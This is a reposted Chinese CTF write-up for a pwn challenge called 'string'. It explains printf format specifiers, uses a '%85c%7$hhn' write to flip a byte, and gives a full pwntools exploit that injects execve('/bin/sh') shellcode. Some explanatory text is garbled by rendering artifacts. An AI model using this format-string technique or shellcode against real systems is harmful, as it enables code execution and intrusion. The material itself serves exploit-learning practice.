ICode9

精准搜索请尝试: 精确搜索
首页 > 系统相关> 文章详细

[fmt+shellcode]string

2021-05-23 11:59:44  阅读:163  来源: 互联网

标签:string 16 fmt .% 地址 偏移 shellcode 字节


[fmt+shellcode]string

1. ida分析

  1. main函数分析

    在这里插入图片描述

  2. 看函数执行流程

    在这里插入图片描述

在这里插入图片描述

  • 通过

    aaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p得到format的偏移,再v2在format上面一个字节,就得到的v2的偏移
    

    在这里插入图片描述

  • 再通过任意写

    %85c%7$hhn 将85写到v2的最低位的字节
    
    1. %c:输出字符,配上%n可用于向指定地址写数据。
    2. %d:输出十进制整数,配上%n可用于向指定地址写数据。
    3. %x:输出16进制数据,如%i x 表 示 要 泄 漏 偏 移 i 处 4 字 节 长 的 16 进 制 数 据 , x表示要泄漏偏移i处4字节长的16进制数据,%i x表示要泄漏偏移i处4字节长的16进制数据,lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。
    4. %p:输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bit下输出8字节,可通过输出字节的长度来判断目标环境是32bit还是64bit。
    5. %s:输出的内容是字符串,即将偏移处指针指向的字符串输出,如%i$s表示输出偏移i处地址所指向的字符串,在32bit和64bit环境下一样,可用于读取GOT表等信息。
    6. %n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,如%100x%10 n 表 示 将 0 x 64 写 入 偏 移 10 处 保 存 的 指 针 所 指 向 的 地 址 ( 4 字 节 ) , 而 n表示将0x64写入偏移10处保存的指针所指向的地址(4字节),而% n表示将0x64写入偏移10处保存的指针所指向的地址(4字节),而hn表示写入的地址空间为2字节,% h h n 表 示 写 入 的 地 址 空 间 为 1 字 节 , hhn表示写入的地址空间为1字节,% hhn表示写入的地址空间为1字节,lln表示写入的地址空间为8字节,在32bit和64bit环境下一样。有时,直接写4字节会导致程序崩溃或等候时间过长,可以通过% h n 或 hn或% hn或hhn来适时调整。
  1. shellcode得以执行

    在这里插入图片描述

2. 思路

  • ida分析过程中已解决

3. exp

from pwn import *
#p = remote()
p = process('./string')
elf = ELF('./string')
context.arch = elf.arch
p.recvuntil('secret[0] is ')
addr1 = int(p.recvuntil('\n')[:-1],16)
log.success('addr1==>'+hex(addr1))
p.recvuntil('secret[1] is ')
addr2 = int(p.recv(7),16)
log.success('addr2==>'+hex(addr2))

context.log_level = 'debug'
p.sendlineafter('What should your character\'s name be:','huzai')
p.sendlineafter('So, where you will go?east or up?:\n','east')
p.sendlineafter('go into there(1), or leave(0)?:\n','1')
p.sendlineafter('\'Give me an address\'\n',str(addr1))
p.sendlineafter('And, you wish is:\n','%85c%7$hhn')

shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
p.sendline(shellcode)



#pwtools shellcode
#p.sendline(asm(shellcraft.sh()))
gdb.attach(p)
p.interactive()

标签:string,16,fmt,.%,地址,偏移,shellcode,字节
来源: https://blog.csdn.net/huzai9527/article/details/117191862

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有